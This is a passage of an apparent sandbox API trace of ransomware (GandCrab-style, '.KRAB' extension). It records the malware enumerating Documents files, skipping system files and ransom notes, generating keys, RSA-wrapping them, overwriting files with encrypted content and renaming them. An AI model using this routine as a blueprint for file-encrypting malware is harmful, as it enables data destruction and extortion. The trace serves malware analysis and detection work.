lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x16024, lpOverlapped=0x0) returned 1 [0091.162] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffe9fdc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.162] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16024, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x16024, lpOverlapped=0x0) returned 1 [0091.163] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0091.163] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.169] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.169] CloseHandle (hObject=0x434) returned 1 [0091.169] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.170] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\hhpd9.rtf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\HhPD9.rtf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\hhpd9.rtf.krab")) returned 1 [0091.171] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.171] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.171] lstrcmpW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2=".") returned 1 [0091.171] lstrcmpW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="..") returned 1 [0091.171] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="jTGU3jmjMoCKLaJPKb.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx" [0091.171] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.171] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx.KRAB") returned 60 [0091.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx") returned 55 [0091.171] lstrlenW (lpString=".xlsx") returned 5 [0091.172] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.172] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0091.173] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx") returned 55 [0091.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx") returned 55 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="desktop.ini") returned 1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="autorun.inf") returned 1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="ntuser.dat") returned -1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="iconcache.db") returned 1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="bootsect.bak") returned 1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="boot.ini") returned 1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="ntuser.dat.log") returned -1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="thumbs.db") returned -1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="ntldr") returned -1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="NTDETECT.COM") returned -1 [0091.173] lstrcmpiW (lpString1="jTGU3jmjMoCKLaJPKb.xlsx", lpString2="Bootfont.bin") returned 1 [0091.173] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.174] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10111b0) returned 1 [0091.174] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.175] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.175] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.175] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0091.175] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0091.175] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.175] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0091.176] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.176] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.176] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.176] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0091.177] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.177] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.177] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0091.177] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0091.177] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.177] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.178] GetLastError () returned 0x0 [0091.178] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0091.178] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.178] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0091.178] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd5a0) returned 1 [0091.181] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.181] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.182] GetLastError () returned 0x0 [0091.182] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0091.182] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0091.182] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jtgu3jmjmocklajpkb.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.182] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.183] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.183] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xa9da, lpOverlapped=0x0) returned 1 [0091.201] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff5626, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.201] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa9da, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xa9da, lpOverlapped=0x0) returned 1 [0091.202] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0091.202] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.226] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.227] CloseHandle (hObject=0x434) returned 1 [0091.227] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.227] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jtgu3jmjmocklajpkb.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\jTGU3jmjMoCKLaJPKb.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jtgu3jmjmocklajpkb.xlsx.krab")) returned 1 [0091.228] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.228] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.228] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0091.228] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0091.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KRAB-DECRYPT.txt" [0091.228] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.229] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KRAB-DECRYPT.txt.KRAB") returned 53 [0091.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KRAB-DECRYPT.txt") returned 48 [0091.229] lstrlenW (lpString=".txt") returned 4 [0091.229] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.229] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0091.229] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.230] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KRAB-DECRYPT.txt") returned 48 [0091.230] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KRAB-DECRYPT.txt") returned 48 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0091.230] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0091.230] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.231] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.231] lstrcmpW (lpString1="KTE_TH_45f-ryz.docx", lpString2=".") returned 1 [0091.231] lstrcmpW (lpString1="KTE_TH_45f-ryz.docx", lpString2="..") returned 1 [0091.231] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="KTE_TH_45f-ryz.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx" [0091.231] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.231] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx.KRAB") returned 56 [0091.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx") returned 51 [0091.231] lstrlenW (lpString=".docx") returned 5 [0091.231] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.232] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0091.233] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx") returned 51 [0091.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx") returned 51 [0091.233] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="desktop.ini") returned 1 [0091.233] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="autorun.inf") returned 1 [0091.233] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="ntuser.dat") returned -1 [0091.233] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="iconcache.db") returned 1 [0091.233] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="bootsect.bak") returned 1 [0091.233] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="boot.ini") returned 1 [0091.233] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="ntuser.dat.log") returned -1 [0091.233] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="thumbs.db") returned -1 [0091.234] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.234] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.234] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.234] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="ntldr") returned -1 [0091.234] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="NTDETECT.COM") returned -1 [0091.234] lstrcmpiW (lpString1="KTE_TH_45f-ryz.docx", lpString2="Bootfont.bin") returned 1 [0091.234] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.234] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011018) returned 1 [0091.235] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.235] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.235] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.235] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0091.235] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0091.235] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.236] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010bd8) returned 1 [0091.236] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.238] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.238] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.238] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0091.238] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0091.238] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.238] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10111b0) returned 1 [0091.239] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0091.239] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.239] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.239] GetLastError () returned 0x0 [0091.239] CryptDestroyKey (hKey=0xfbd920) returned 1 [0091.239] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0091.239] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0091.240] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0091.240] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.240] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.240] GetLastError () returned 0x0 [0091.240] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0091.240] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.240] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\kte_th_45f-ryz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.241] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.243] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.243] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x790b, lpOverlapped=0x0) returned 1 [0091.270] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff86f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.270] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x790b, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x790b, lpOverlapped=0x0) returned 1 [0091.270] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0091.270] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.282] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.283] CloseHandle (hObject=0x434) returned 1 [0091.283] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.283] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\kte_th_45f-ryz.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\KTE_TH_45f-ryz.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\kte_th_45f-ryz.docx.krab")) returned 1 [0091.284] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.284] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.284] lstrcmpW (lpString1="lt4y5G.pptx", lpString2=".") returned 1 [0091.284] lstrcmpW (lpString1="lt4y5G.pptx", lpString2="..") returned 1 [0091.284] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="lt4y5G.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx" [0091.284] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.285] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx.KRAB") returned 48 [0091.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx") returned 43 [0091.285] lstrlenW (lpString=".pptx") returned 5 [0091.285] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.285] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pptx ") returned 6 [0091.285] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx") returned 43 [0091.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx") returned 43 [0091.285] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="desktop.ini") returned 1 [0091.286] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="autorun.inf") returned 1 [0091.286] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="ntuser.dat") returned -1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="iconcache.db") returned 1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="bootsect.bak") returned 1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="boot.ini") returned 1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="ntuser.dat.log") returned -1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="thumbs.db") returned -1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="ntldr") returned -1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="NTDETECT.COM") returned -1 [0091.287] lstrcmpiW (lpString1="lt4y5G.pptx", lpString2="Bootfont.bin") returned 1 [0091.287] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.287] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0091.288] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.289] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.289] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.289] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0091.289] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.289] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.289] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0091.290] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.290] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.290] GetProcAddress 